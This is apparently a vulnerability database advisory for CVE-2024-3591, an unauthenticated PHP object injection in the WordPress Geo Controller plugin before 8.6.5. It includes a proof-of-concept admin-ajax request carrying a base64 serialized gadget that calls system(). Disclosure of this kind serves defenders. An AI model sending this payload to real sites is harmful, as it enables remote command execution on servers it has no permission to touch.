WordPress Geo Controller < 8.6.5 – PHP Object Injection | CVE 2024-3591 | Plugin Vulnerabilities

Description

The plugin unserializes user input via some of its AJAX actions and REST API routes, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.

Proof of Concept

/wp-admin/admin-ajax.php?action=cf_geoplugin_shortcode_cache&options=TzoxMzoiV1BfSFRNTF9Ub2tlbiI6Mjp7czoxMzoiYm9va21hcmtfbmFtZSI7czo0OiJjYWxjIjtzOjEwOiJvbl9kZXN0cm95IjtzOjY6InN5c3RlbSI7fQ==

Affects Plugins

Fixed in 8.6.5

References

CVE

URL

https://github.com/fuyoumingyan/vul/blob/main/WordPress%20Geo%20Controller%20Plugin%20%20-%20PHP%20Object%20Injection.md

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

fuyoumingyan

Submitter

fuyoumingyan

Submitter website

https://github.com/fuyoumingyan/vul/blob/main/WordPress%20Geo%20Controller%20Plugin%20%20-%20PHP%20Object%20Injection.md

Verified

Yes

WPVDB ID

f85d8b61-eaeb-433c-b857-06ee4db5c7d5

Timeline

Publicly Published

2024-04-10 (about 1 year ago)

Added

2024-04-10 (about 1 year ago)

Last Updated

2024-04-10 (about 1 year ago)

Other

Published

Title

Published

2024-04-29

Title

Event Monster < 1.4.0 - Contributor+ PHP Object Injection via Custom Meta

Published

2022-10-17

Title

Role Based Pricing for WooCommerce < 1.6.3 - Subscriber+ PHAR Deserialization

Published

2025-03-27

Title

Drag and Drop Multiple File Upload for Contact Form 7 < 1.3.8.9 - Unauthenticated PHP Object Injection via PHAR to Arbitrary File Deletion

Published

2025-08-08

Title

Gravity Forms Keap/Infusionsoft < 1.2.4 - Unauthenticated PHP Object Injection

Published

2025-03-11

Title

Workreap < 3.2.6 - Unauthenticated Privilege Escalation